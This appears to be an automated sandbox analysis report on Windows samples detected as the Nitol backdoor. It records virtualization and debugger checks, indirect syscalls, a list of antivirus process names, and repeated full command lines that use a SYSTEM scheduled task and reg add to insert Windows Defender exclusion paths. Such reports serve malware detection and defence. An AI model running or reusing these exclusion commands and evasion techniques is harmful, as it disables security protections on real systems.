EV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\1387457-38765948.15.exe	RDTSC instruction interceptor: First address: 14000111B second address: 140001132 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	RDTSC instruction interceptor: First address: 140001132 second address: 140001132 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FDCC5151270h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\cajXRH.exe	RDTSC instruction interceptor: First address: 5AC895 second address: 5AC8A3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Users\user\Documents\cajXRH.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_4-14031
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_41-3272

Source: C:\Users\user\Documents\cajXRH.exe

API coverage: 2.7 %

Source: C:\Users\user\Documents\cajXRH.exe TID: 6792	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe TID: 504	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe TID: 504	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 1804	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 2172	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 1720	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 6984	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 1740	Thread sleep count: 83 > 30	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 1740	Thread sleep time: -41500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 6984	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 5300	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 5300	Thread sleep time: -33000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe TID: 1720	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\cajXRH.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_00007FFE1320A1B8 FindFirstFileExW,

4_2_00007FFE1320A1B8

Source: C:\Users\user\Documents\cajXRH.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: 1387457-38765948.15.exe, 00000000.00000003.2173635647.00000000004B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&mz
Source: 4fkch1.exe, 00000027.00000002.3565592607.0000000001007000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: 1387457-38765948.15.exe, 00000000.00000003.2173635647.00000000004B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Documents\cajXRH.exe	API call chain: ExitProcess graph end node			graph_4-14032
Source: C:\Users\user\Documents\cajXRH.exe	API call chain: ExitProcess graph end node			graph_4-14376

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_00000001400073E0 LdrLoadDll,

4_2_00000001400073E0

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0000000140007C91

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

4_2_0000000140004630

Source: C:\Users\user\Documents\cajXRH.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0000000140007C91
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00000001400106B0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,	4_2_00000001400092E0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00007FFE13201F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFE13201F50
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00007FFE132076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE132076E0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00007FFE13202630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE13202630
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Code function: 41_2_008A10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_008A10CC
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Code function: 41_2_008A2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_008A2AE2
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Code function: 41_2_008A51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_008A51FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\cajXRH.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	NtDelayExecution: Indirect: 0x1F94CC	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	NtProtectVirtualMemory: Indirect: 0x2A3B253	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	NtProtectVirtualMemory: Indirect: 0x2B5B253	Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Program Files (x86)\4fkch1\4fkch1.exe "C:\Program Files (x86)\4fkch1\4fkch1.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_00007FFE1320FD40 cpuid

4_2_00007FFE1320FD40

Source: C:\Users\user\Documents\cajXRH.exe	Code function: GetLocaleInfoA,		4_2_000000014000F370
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Code function: GetLocaleInfoA,		41_2_008A6B1A

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_000000014000A370

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_0000000140005A70

Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: 4fkch1.exe, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: cajXRH.exe, 00000004.00000002.2328917062.0000000002928000.00000002.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 39.2.4fkch1.exe.47d03e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.4fkch1.exe.47d03e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.4fkch1.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4fkch1.exe PID: 2492, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 39.2.4fkch1.exe.47d03e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.4fkch1.exe.47d03e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.4fkch1.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4fkch1.exe PID: 2492, type: MEMORYSTR

Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		4_2_00000001400042B0
